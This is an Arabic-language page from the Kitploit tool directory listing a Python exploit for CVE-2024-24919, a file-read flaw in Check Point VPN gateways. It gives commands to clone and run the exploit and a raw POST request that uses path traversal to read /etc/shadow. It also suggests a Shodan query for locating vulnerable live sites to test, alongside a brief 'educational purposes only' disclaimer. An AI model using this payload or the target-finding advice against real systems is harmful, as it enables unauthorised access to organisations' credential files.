Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-24919-Exploit — CVE-2024-24919 استغلال وPoC - LFI حرج للوصول عن بعد عبر VPN أو الوصول عبر الجوال. | Kitploit
أدوات/GitHubGitHub/rug4lo/cve-2024-24919-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubrug4lo/cve-2024-24919-exploit

CVE-2024-24919-Exploit

CVE-2024-24919 استغلال وPoC - LFI حرج للوصول عن بعد عبر VPN أو الوصول عبر الجوال.

عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-24919-Exploit

نظرة عامة

يحتوي هذا المستودع على استغلال بلغة بايثون للثغرة CVE-2024-24919، وهي ثغرة تسمح لك بقراءة الملفات الحساسة من الصفحة المعرضة للخطر.

يقوم هذا الاستغلال أولاً بالتحقق مما إذا كان الهدف معرضًا للخطر، ثم يحصل على المسار الذي تحدده.

الخطورة: حرجة

الاستخدام

أولاً قم باستنساخ المستودع:

root@kitploit:~
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

امنح الصلاحيات وقم بتنفيذ الاستغلال باستخدام python3

root@kitploit:~
chmod +x exploit.py
python3 exploit.py

ثم اتبع الخطوات وستحصل على بيانات الملف الذي تحدده

إذا كنت تواجه صعوبة، تأكد من أن عنوان URL الذي تحدده هو الرئيسي

✓ https://google.com

✘ https://google.com/search?client=firefox

إثبات المفهوم (POC)

أولاً نحتاج للتأكد من أن الموقع يحتوي على بوابات أمان Check Point مع تمكين الوصول عن بُعد عبر VPN أو برنامج الوصول عبر الهاتف المحمول.

في هذا الاستغلال نشير إلى نقطة النهاية {ip}/clients/MyCRL.

هذه النقطة النهائية معرضة للخطر إذا قمنا بإرسال طلب POST، نضيف السلسلة CSHELL/ ومسار الملف الذي نريد قراءته باستخدام Path Traversal.

سيكون الطلب شيئًا كهذا:

root@kitploit:~
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

نحصل على كل هذا من خلال النظر إلى الكود المصدري

لمزيد من المعلومات حول العملية، تحقق من هذه المقالة --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

اختبار

إذا كنت تريد اختبار هذه الثغرة، يمكنك استخدام Sodan للعثور على بعض المواقع المعرضة للخطر، باستخدام هذا الاستعلام في sodan

root@kitploit:~
Server: "Check Point SVN Foundation"

المراجع

https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

إخلاء المسؤولية

هذا النص البرمجي لأغراض تعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن بالوصول إليها.

تنزيل الأداة